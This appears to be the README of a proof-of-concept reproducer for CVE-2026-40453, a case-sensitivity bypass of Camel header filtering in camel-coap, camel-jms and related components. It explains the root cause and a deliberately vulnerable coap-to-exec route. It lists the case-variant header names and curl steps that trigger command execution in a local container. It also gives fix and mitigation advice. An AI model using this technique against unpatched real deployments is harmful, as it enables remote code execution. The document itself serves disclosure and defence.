Share
## https://sploitus.com/exploit?id=D3379F17-C9FD-5588-8FB8-4A7C177A58EF
# Case-Variant Camel Header Injection Reproducer (CVE-2026-40453)

This project demonstrates **CVE-2026-40453** โ€” an incomplete fix for **CVE-2025-27636**. The 2025 fix
added `setLowerCase(true)` to `HttpHeaderFilterStrategy` so that case-variant header names (e.g.
`CAmelExecCommandExecutable`) are filtered alongside the canonical `CamelExecCommandExecutable`. The
same call was **not** applied to five non-HTTP `HeaderFilterStrategy` implementations
(`camel-jms`, `camel-sjms`, `camel-coap`, `camel-google-pubsub`), which filter case-sensitively while
the Camel Exchange stores headers in a case-**insensitive** map. An attacker can therefore inject a
case-variant `Camel*` control header that bypasses the filter but is still resolved by downstream
components (`camel-exec`, `camel-file`, ...) under its canonical name โ†’ **remote code execution** /
arbitrary file write.

This reproducer demonstrates the bypass with **camel-coap** (self-contained, no external broker); the
same flaw affects the JMS/SJMS/Google-Pubsub strategies.

Advisory: https://camel.apache.org/security/CVE-2026-40453.html

## Vulnerability Summary

| Property | Value |
|----------|-------|
| **Components** | `camel-jms`, `camel-sjms`, `camel-coap`, `camel-google-pubsub` (this PoC uses camel-coap) |
| **Affected Classes** | `JmsHeaderFilterStrategy`, `ClassicJmsHeaderFilterStrategy`, `SjmsHeaderFilterStrategy`, `CoAPHeaderFilterStrategy`, `GooglePubsubHeaderFilterStrategy` |
| **Root cause** | Case-sensitive `startsWith("Camel"/"camel")` filtering (missing `setLowerCase(true)`) vs a case-insensitive Exchange header map |
| **CWE** | CWE-20 (Improper Input Validation) โ€” message header injection |
| **Impact** | RCE / arbitrary file write via header-driven producers |
| **Affected Versions** | From 3.0.0 before 4.14.6, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0 |
| **Fixed Versions** | 4.14.6, 4.18.2, 4.20.0 |
| **JIRA** | CAMEL-23313 (completes the fix for CVE-2025-27636) |
| **Reporter** | Saroj Khadka |

## Technical Details

`CoAPHeaderFilterStrategy` (affected version) filters `Camel*` **case-sensitively**:

```java
public CoAPHeaderFilterStrategy() {
    setOutFilterStartsWith(CAMEL_FILTER_STARTS_WITH);
    setInFilterStartsWith(CAMEL_FILTER_STARTS_WITH);
    // MISSING: setLowerCase(true);
}
```

When a CoAP request arrives, `CamelCoapResource.handleRequest()` maps each URI-query parameter into the
Exchange In headers, gated by `strategy.applyFilterToExternalHeaders(name, value, exchange)`:

- `CamelExecCommandExecutable` โ€” `startsWith("Camel")` is **true** โ†’ filtered out.
- `CAmelExecCommandExecutable` โ€” `startsWith("Camel")` is **false** (`CAm` โ‰  `Cam`) โ†’ **not** filtered.

The Exchange header map is case-**insensitive**, so the case-variant header is later resolved by the
exec producer under its canonical name `CamelExecCommandExecutable`, overriding the command.

## The victim route

```java
from("coap://0.0.0.0:5683/run")
    .to("exec:echo?args=hello")
    .convertBodyTo(String.class);
```

## Prerequisites

- Java 17+ and Maven 3.8+
- Docker

## Reproduction Steps

```bash
mvn clean package -DskipTests
docker compose up -d --build
```

### 1) Benign

```bash
curl http://localhost:8080/exploit/normal      # -> hello
```

### 2) Canonical header โ€” FILTERED (no RCE)

```bash
curl http://localhost:8080/exploit/canonical
# injects CamelExecCommandExecutable / CamelExecCommandArgs
# -> /tmp/pwned-canonical created: false   (the filter strips canonical Camel* headers)
```

### 3) Case-variant header โ€” BYPASS (RCE)

```bash
curl http://localhost:8080/exploit/attack
# injects CAmelExecCommandExecutable / CAmelExecCommandArgs (capital A)
# -> /tmp/pwned created: true   (case-variant bypasses the case-sensitive filter)
docker exec cve-2026-40453 ls -la /tmp/pwned
```

### Cleanup

```bash
docker compose down
```

## Recommended Fix

Upgrade to 4.14.6 / 4.18.2 / 4.20.0. The fix (CAMEL-23313) adds `setLowerCase(true)` to the five
non-HTTP `HeaderFilterStrategy` implementations so case-variant `Camel*` names are also filtered.

## Mitigation

Until upgrading:

1. **Strip Camel headers case-insensitively** downstream of untrusted producers โ€” a custom
   `HeaderFilterStrategy` with `setLowerCase(true)`, or `removeHeaders` with a case-insensitive pattern.
2. Avoid forwarding untrusted JMS / CoAP / Pub-Sub messages into header-driven producers.

## Files

```
CVE-2026-40453/
โ”œโ”€โ”€ pom.xml
โ”œโ”€โ”€ Dockerfile
โ”œโ”€โ”€ docker-compose.yml
โ”œโ”€โ”€ README.md
โ””โ”€โ”€ src/main/
    โ”œโ”€โ”€ java/com/example/
    โ”‚   โ”œโ”€โ”€ Application.java
    โ”‚   โ”œโ”€โ”€ CoapExecRoute.java        # victim: from(coap).to(exec)
    โ”‚   โ””โ”€โ”€ ExploitController.java    # /normal, /canonical (filtered), /attack (case-variant bypass)
    โ””โ”€โ”€ resources/
        โ””โ”€โ”€ application.properties
```

## Disclaimer

This reproducer is provided for **security research and authorized testing only**, for a **publicly
disclosed and fixed** vulnerability. Do not use it against systems without explicit permission.